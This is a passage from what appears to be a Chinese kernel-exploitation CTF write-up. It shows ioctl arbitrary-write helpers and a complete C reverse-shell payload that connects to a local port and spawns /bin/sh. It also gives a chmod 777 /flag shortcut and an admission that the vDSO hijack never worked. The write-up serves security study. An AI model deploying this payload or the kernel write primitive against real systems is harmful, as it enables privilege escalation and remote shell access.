addr;ioctl(devFD,111,&arbWriteObj);}void arbitrary_write(int devFD,int len,char *buf,size_t addr){arbWriteObj.len = len;arbWriteObj.data = buf;arbWriteObj.addr = addr;ioctl(devFD,222,&arbWriteObj);}
#include <stdio.h>#include <stdlib.h>#include <errno.h>#include <string.h>#include <netdb.h>#include <sys/types.h>#include <netinet/in.h>#include <sys/socket.h>#include <arpa/inet.h>int main(int argc,char *argv[]){//system("chmod 777 /flag");int sockfd,numbytes;char buf[BUFSIZ];struct sockaddr_in their_addr;printf("break!");while((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1);printf("We get the sockfd~\n");their_addr.sin_family = AF_INET;their_addr.sin_port = htons(7777);their_addr.sin_addr.s_addr=inet_addr("127.0.0.1");bzero(&(their_addr.sin_zero), 8);while(connect(sockfd,(struct sockaddr*)&their_addr,sizeof(struct sockaddr)) == -1);dup2(sockfd,0);dup2(sockfd,1);dup2(sockfd,2);system("/bin/sh");return 0;}
或者直接system("chmod 777 /flag");也是获取flag的一种方式。
▲vdso的劫持一直没有复现成功过,明明已经劫持gettimeofday函数的内容为shellcode,然后也挂载了循环调用gettimeofday的程序,但是就是运行不了shellcode。
参考:
1、Kernel Pwn 学习之路 - 番外 - 安全客,安全资讯平台 (anquanke.com)
(https://www.anquanke.com/post/id/204319#h3-12)
2、https://www.jianshu.com/p/07994f8b2bb0
3、https://blog.csdn.net/seaaseesa/article/details/104695399
看雪ID:PIG-007
https://bbs.pediy.com/user-home-904686.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!